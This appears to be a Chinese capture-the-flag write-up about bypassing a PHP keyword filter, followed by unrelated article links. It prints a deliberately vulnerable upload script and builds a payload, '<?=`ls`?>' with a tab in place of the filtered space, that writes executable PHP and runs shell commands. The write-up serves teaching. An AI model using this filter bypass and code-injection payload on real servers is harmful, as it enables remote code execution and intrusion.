php反引號與短標(biāo)簽?zāi)_本示例
<?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input; } } function waf($input){ if(is_array($input)){ foreach($input as $key=>$output){ $input[$key] = waf($output); } }else{ $input = check($input); } } $dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/'; if(!file_exists($dir)){ mkdir($dir); } switch($_GET["action"] ?? "") { case 'pwd': echo $dir; break; case 'upload': $data = $_GET["data"] ?? ""; waf($data); file_put_contents("$dir" . "index.php", $data); } ?>
代碼審查,參數(shù)action控制兩個模式,當(dāng)action=upload的時候會將參數(shù)data的值進(jìn)行過濾并且作為file_put_contents的第三個參數(shù),可以試試輸入123的時候是個什么效果,我查資料發(fā)現(xiàn)這個函數(shù)的第三個參數(shù)具體用法是啥我也不知道
當(dāng)action=pwd的時候,他會輸出目錄給我們。
一開始兩個問號是個啥我也不曉得,查了一下
??是php7新推出來的表達(dá)式,有利于簡便三元運(yùn)算符
例:
$example=$_GET['web']??0;
相當(dāng)于
$example=$_GET['web']?$_GET['web']:0;
意思就是如果web參數(shù)如果存在則返回本身,否則返回0
function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input; } } function waf($input){ if(is_array($input)){ foreach($input as $key=>$output){ $input[$key] = waf($output); } }else{ $input = check($input); } }
可以發(fā)現(xiàn)這是對data參數(shù)的過濾防護(hù),過濾了php,eval,花括號等,其實這些過濾內(nèi)容有點提示我們要用php標(biāo)簽,但是php,eval,空格這些都被過濾掉了,這時候就有新東西學(xué)習(xí)了
反引號執(zhí)行系統(tǒng)命令,以及php短標(biāo)簽
PHP: 執(zhí)行運(yùn)算符 - Manual就像如果我們要執(zhí)行l(wèi)s命令,通常我們都是system('ls');但是有了反引號,我們直接`ls`即可執(zhí)行,是不是方便多了,但是要開一個默認(rèn)選項(默認(rèn)都是打開的),并且不能在雙引號字符中使用
php中的短標(biāo)簽 http://www.dbjr.com.cn/article/112327.htm
<?$a?>相當(dāng)于<?php?> <?=$a?>相當(dāng)于<?php echo $a?>還省略了eval需要的分號
因此我們思路就是,當(dāng)切換在upload模式的時候,我們可以控制data參數(shù)傳入php表達(dá)式看看效果,然后切換到pwd模式獲取路徑進(jìn)入到下面去看看
成功回顯1234,有點渲染那味了
構(gòu)造action=upload&data=<?=`ls`?>,因為空格被過濾了,我們可以利用水平制符\t來代替空格
繼續(xù)執(zhí)行命令即可
以上就是php反引號與短標(biāo)簽?zāi)_本示例的詳細(xì)內(nèi)容,更多關(guān)于php反引號與短標(biāo)簽?zāi)_本的資料請關(guān)注腳本之家其它相關(guān)文章!
相關(guān)文章
在Yii2特定頁面如何禁用調(diào)試工具欄Debug Toolbar詳解
這篇文章主要給大家介紹了關(guān)于在Yii2特定頁面如何禁用調(diào)試工具欄Debug Toolbar的相關(guān)資料,文中通過詳細(xì)的示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,需要的朋友們下面來一起看看吧。2017-08-08PHP仿博客園 個人博客(2) 數(shù)據(jù)庫增添改刪
先謝謝大家的鼓勵與支持,這是第2篇了。也是這個博客系統(tǒng)最核心的東西。這個博客寫完后,我會把它放在我的博客網(wǎng)站。這里也有我的一個簡歷2013-07-07php提示Call-time pass-by-reference has been deprecated in的解決方法
今天一個客戶配置服務(wù)器的時候出現(xiàn)了這個問題,主要是因為他選錯php.ini的問題,默認(rèn)先dist那個比較好,實際應(yīng)用就選擇這個2012-05-05CI框架(CodeIgniter)實現(xiàn)的數(shù)據(jù)庫增刪改查操作總結(jié)
這篇文章主要介紹了CI框架(CodeIgniter)實現(xiàn)的數(shù)據(jù)庫增刪改查操作,結(jié)合實例形式總結(jié)分析了CI框架針對mysql數(shù)據(jù)庫增刪改查操作的模型、控制器及視圖相關(guān)定義與使用技巧,需要的朋友可以參考下2018-05-05PHP處理二進(jìn)制數(shù)據(jù)的實現(xiàn)方法
下面小編就為大家?guī)硪黄狿HP處理二進(jìn)制數(shù)據(jù)的實現(xiàn)方法。小編覺得挺不錯的,現(xiàn)在就分享給大家,也給大家做個參考。一起跟隨小編過來看看吧2016-06-06